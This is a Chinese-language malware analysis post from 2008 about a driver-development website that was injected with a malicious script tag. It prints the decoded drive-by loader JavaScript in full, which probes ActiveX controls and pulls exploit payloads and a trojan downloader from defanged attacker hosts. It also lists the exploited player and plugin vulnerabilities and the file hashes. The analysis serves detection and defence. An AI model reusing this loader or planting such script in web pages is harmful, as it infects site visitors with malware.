某驱动开发网被挂马Trojan.DL.Win32.Small.gkm
endurer 原创
2008-01-23 第1版
打开该网站,Kaspersky报告:
2008-1-21 14:30:41 恶意 HTTP 对象 <hxxp://list**.ad*s**looks.info/list.js>: 已检测 木马程序 Trojan-Downloader.JS.Small.js.
检查网站首页代码,发现:
/---
<SCRIPT LANGUAGE="javascript1.2" SRC="hxxp://list**.ad*s**looks.info/list.js"></SCRIPT>
---/
可能是该网站服务器所在机房有ARP病毒在做怪。
hxxp://list**.ad*s**looks.info/list.js的代码解密为后为:
/---
if(document.cookie.indexOf('OKSUN')==-1){try{var e;var ado=(document.createElement("object"));ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");var as=ado.createobject("Adodb.Stream","")}catch(e){};finally{var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='OKSUN=SUN;path=/;expires='+expires.toGMTString();document.write("<script src=hxxp://k***.2*2**2*360.com/6.gif><//script>");if(e!="[object Error]"){document.write("<script src=hxxp://k***.2*2**2*360.com/1.gif><//script>")}else{try{var f;var storm=new ActiveXObject("MPS.StormPlayer")}catch(f){};finally{if(f!="[object Error]"){document.write("<script src=hxxp://k***.2*2**2*360.com/2.gif><//script>");document.write("<DIV style=/"CURSOR: url('hxxp://k***.2*2**2*360.com/ads.c')/"></DIV>")}}try{var g;var pps=new ActiveXObject("POWERPLAYER.PowerPlayerCtrl.1")}catch(g){};finally{if(g!="[object Error]"){document.write("<script src=hxxp://k***.2*2**2*360.com/3.gif><//script>");document.write("<DIV style=/"CURSOR: url('hxxp://k***.2*2**2*360.com/ads.c')/"></DIV>")}}try{var h;var thunder=new ActiveXObject("DPClient.Vod")}catch(h){};finally{if(h!="[object Error]"){document.write("<script src=hxxp://k***.2*2**2*360.com/4.gif><//script>");document.write("<DIV style=/"CURSOR: url('hxxp://k***.2*2**2*360.com/ads.c')/"></DIV>")}}try{var i;var yahoo=new ActiveXObject("GLCHAT.GLChatCtrl.1")}catch(i){};finally{if(i!="[object Error]"){document.write("<iframe style=display:none src=hxxp://k***.2*2**2*360.com/5.gif></iframe>")}}try{var j;var obj=new ActiveXObject("BaiduBar.Tool")}catch(j){};finally{if(j!="[object Error]"){obj.DloadDS("hxxp://k***.2*2**2*360.com/ads/ads.cab","ads.exe",0);document.write("<DIV style=/"CURSOR: url('hxxp://k***.2*2**2*360.com/ads.c')/"></DIV>")}}if(f=="[object Error]"&&g=="[object Error]"&&h=="[object Error]"&&i=="[object Error]"&&j=="[object Error]"){document.write("<DIV style=/"CURSOR: url('hxxp://k***.2*2**2*360.com/ads.c')/"></DIV>")}}}}<script src=hxxp://k***.2*2**2*360.com/6.gif></script><script src=hxxp://k***.2*2**2*360.com/3.gif></script><DIV style="CURSOR: url('hxxp://k***.2*2**2*360.com/ads.c')"></DIV>
---/
1. hxxp://k***.2*2**2*360.com/6.gif 包含利用RealPlayer漏洞利用代码
2. hxxp://k***.2*2**2*360.com/1.gif
Kaspersky 报为 Trojan-Downloader.JS.Small.en,包含 利用 MS06014 漏洞下载 hxxp://k***.2*2**2*360.com/ads/ads.jpg.exe 的 JavaScript 脚本代码
文件说明符 : D:/test/ads.jpg.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-11-23 13:15:50
修改时间 : 2007-11-23 13:15:50
访问时间 : 2008-1-22 0:0:0
大小 : 6656 字节 6.512 KB
MD5 : f81ce2b0f46ca9ced6558fdadfb45099
SHA1: 90E14F9049B51DF1BF70A8363162C782B321714E
CRC32: d55ccaa9
Kaspersky 报为 Trojan-Downloader.Win32.Small.gkm,感星报为 Trojan.DL.Win32.Small.gkm
3. hxxp://k***.2*2**2*360.com/2.gif
包含 利用暴风影音漏洞下载hxxp://ads**.ad*s**looks.info/ads/ads.exe 的JavaScript 脚本代码
ads.exe 与 ads.jpg.exe 相同
4. hxxp://k***.2*2**2*360.com/ads.c
利用 ANI漏洞下载hxxp://ads**.ad*s**looks.info/ads/ads.exe
5 hxxp://k***.2*2**2*360.com/3.gif
包含利用PPStream漏洞下载 hxxp://ads**.ad*s**looks.info/ads/ads.exe 的 JavaScript 脚本代码
5. hxxp://k***.2*2**2*360.com/4.gif
包含利用迅雷漏洞下载 hxxp://ads**.ad*s**looks.info/ads/ads.exe 的 JavaScript 脚本代码
6. hxxp://k***.2*2**2*360.com/5.gif
Kaspersky报为 Trojan-Downloader.JS.Small.jh
利用联众世界GLChat.ocx 控件漏洞下载hxxp://ads**.ad*s**looks.info/ads/ads.exe
7.hxxp://k***.2*2**2*360.com/ads/ads.cab 包含 ads.exe